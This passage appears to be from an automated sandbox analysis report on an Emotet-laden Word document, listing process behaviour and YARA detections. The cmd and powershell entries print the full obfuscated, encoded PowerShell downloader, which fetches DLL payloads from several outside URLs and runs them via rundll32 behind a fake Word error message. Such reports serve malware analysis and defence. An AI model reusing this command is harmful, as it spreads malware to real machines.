fc 0d 1b b6 d7 75 53 b4 97 c0 14 f6 da ae 02 d3 fc cb 3c e4 30 27 18 28 53 5b ef 41 00 c1 65 17 b3 fc 03 cd 60 89 9b 07 a1 66 09 7e 2d 3c e5 1d 92 2f ab 8a 02 78 63 c8 49 47 cc 3d 98 17 aa 99 b0 77 71 2c f1 14 8b fe 22 0e 8d 99 18 79 06 93 24 ad 8f 75 54 d8 f0 4e 5e c5 a2 4d 7d 73 18 e2 2b a1 0c fb cc 9c 7b a2 a0 99 c2 07 6e dc 71 de 7b db c6 cc 65 86 5c 04 30 2b 09 8c 26 bf 33 bc 95 23 8d 95 ee 7a b0 ea 9b f2 48 8a d6 40 b5 cb 25 0f bd 5b 0b 8d 29 8c 59 13 51 9d af 13 e7 13 c6 e6 10 3e 28 cf 0c 07 35 69 13 7a 5e 2e fa 8b 70 58 e8 42 a9 46 81 69 da 39 68 64 ef cb 82 3c 62 09 f9 d0 dd 46 d5 f3 45 a6 8f 38 4f a6 05 b8 7b 13 19 04 68 68 1d c2 14 79 eb 5c 4b 15 f4 2a 02 ee 0c 75 ca 33 5e c5 e1 4f d9 e8 68 6f 32 ff a3 75 ee 72 6b d1 46 e7 f2 9b 41 21 c0 c8 cd e9 30 9d c8 f7 f9 de 43 49 05 6c f7 c0 6a f5 31 46 a4 ec 13 6b bd c3 3a e4 96 3d 15 58 1d 7d 4a 0e cc 28 43 e7 9f 4d 6b 64 96 d6 d8 5b da 51 e7 92 fa e6 a8 9a a2 51 0f d5 a5 68 5c 29 c9 00 da 7e 8c 86 2c 89 43 99 ee 92 34 aa 5f 8e a1 7b 07 2c 9e 7c fb 24 70 5d 92 94 be 7e a1 17 aa aa d0 d7 96 53 d9 4c 8e 15 d8 36 60 21 50 75 03 56 02 20 3f 73 d7 92 0a f4 4a c7 18 1e 4b 56 76 b8 67 21 e6 c3 42 58 a3 44 84 1c 59 a6 9a 8b ec 36 b0 3d 89 6b 89 81 26 ed d5 04 75 a8 c8 c5 c1 ea 70 9f 67 0a c2 03 07 cd 80 29 a6 55 92 6b 4b 1e 45 c4 dc d4 af d9 f3 ed 36 5b 77 7f 9b aa 23 16 69 da 9c 3e 18 57 76 11 71 9b 48 ec e6 9a 22 d5 9b 59 5f 53 e5 92 1b fc c8 4d 09 b3 78 99 f5 19 57 64 ae a0 ca 3c 19 c7 95 02 62 1d 16 a8 5a e8 fb 73 30 d0 39 04 fd 0d c0 89 3f 86 01 b0 3c 85 b4 b8 43 60 4f 0e a8 0a a7 3a 6f 18 cb bb c7 29 55 39 f2 21 6b c8 1f e3 87 c0 e5 55 04 c7 09 56 2a f9 bc 9a 36 b4 1d 0a 35 c8 8e 89 1e 6c 73 34 f9 c2 4f 8c 63 a3 bf 85 55 6d 81 c9 df e4 d5 16 e0 d6 5b 26 87 04 3d 83 bd 13 f6 38 88 49 02 43 d3 bf b8 1c 54 c6 b5 d7 4d 76 28 dc ab 94 5a 80 55 35 a4 85 d6 54 90 e9 68 6f 44 76 c1 78 f7 29 0d 14 f0 70 93 4d 08 3b 3d d6 8a 0a 05 c9 ca 0b 88 ce 98 97 7a 67 6a 7e 89 ab db 47 05 40 0d ec 3e 54 f5 42 d4 b7 3a 6c b1 ec 3b 10 0b aa 9a a6 bc 51 d1 94 db c0 59 ff ca 5e b0 ce 99 72 28 be 6e 9d d6 8f 10 d8 38 1d 28 9d 34 91 aa 28 f8 f5 3b 9a 31 da f3 60 2d 1e 69 b9 bd 74 7c b7 a9 09 a9 7d 19 92 d5 d1 2e f0 3e c2 41 c1 cd 3a c5 01 7d 42 88 4a fb 88 a2 14 32 3d 18 46 98 cf 7c ce 3b 69 67
                                            Data Ascii: a54|1TwTy46"+A^)C"KTE$.Is!T_SItw'a'R$A]J`\A3~$PDz+W]_R/?t,KQxhe:Mx"Duo[XVYm|xf..e.?h#Ot&~*i^<!rP |L4O} Gwa/SbQZOY.<GM.y'4q1c_#:/MuS<0'(S[Ae`f~-</xcIG=wq,"y$uTN^M}s+{nq{e\0+&3#zH@%[)YQ>(5iz^.pXBFi9hd<bFE8O{hhy\K*u3^Oho2urkFA!0CIlj1Fk:=X}J(CMkd[QQh\)~,C4_{,|$p]~SL6`!PuV ?sJKVvg!BXDY6=k&upg)UkKE6[w#i>WvqH"Y_SMxWd<bZs09?<C`O:o)U9!kUV*65ls4OcUm[&=8ICTMv(ZU5ThoDvx)pM;=zgj~G@>TB:l;QY^r(n8(4(;1`-it|}.>A:}BJ2=F|;ig


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: WINWORD.EXE PID: 532 Parent PID: 584

                                            General

                                            Start time:08:44:40
                                            Start date:06/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13fe70000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: cmd.exe PID: 1604 Parent PID: 1220

                                            General

                                            Start time:08:44:42
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
                                            Imagebase:0x4a370000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: msg.exe PID: 2524 Parent PID: 1604

                                            General

                                            Start time:08:44:43
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xffc10000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: powershell.exe PID: 2544 Parent PID: 1604

                                            General

                                            Start time:08:44:43
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
                                            Imagebase:0x13fed0000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107604650.00000000003D6000.00000004.00000001.sdmp, Author: Florian Roth
                                            Reputation:high

                                            Analysis Process: rundll32.exe PID: 2808 Parent PID: 2544

                                            General

                                            Start time:08:44:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                            Imagebase:0xffde0000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2724 Parent PID: 2808

                                            General

                                            Start time:08:44:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2468 Parent PID: 2724

                                            General

                                            Start time:08:44:51
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2916 Parent PID: 2468

                                            General

                                            Start time:08:44:51
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
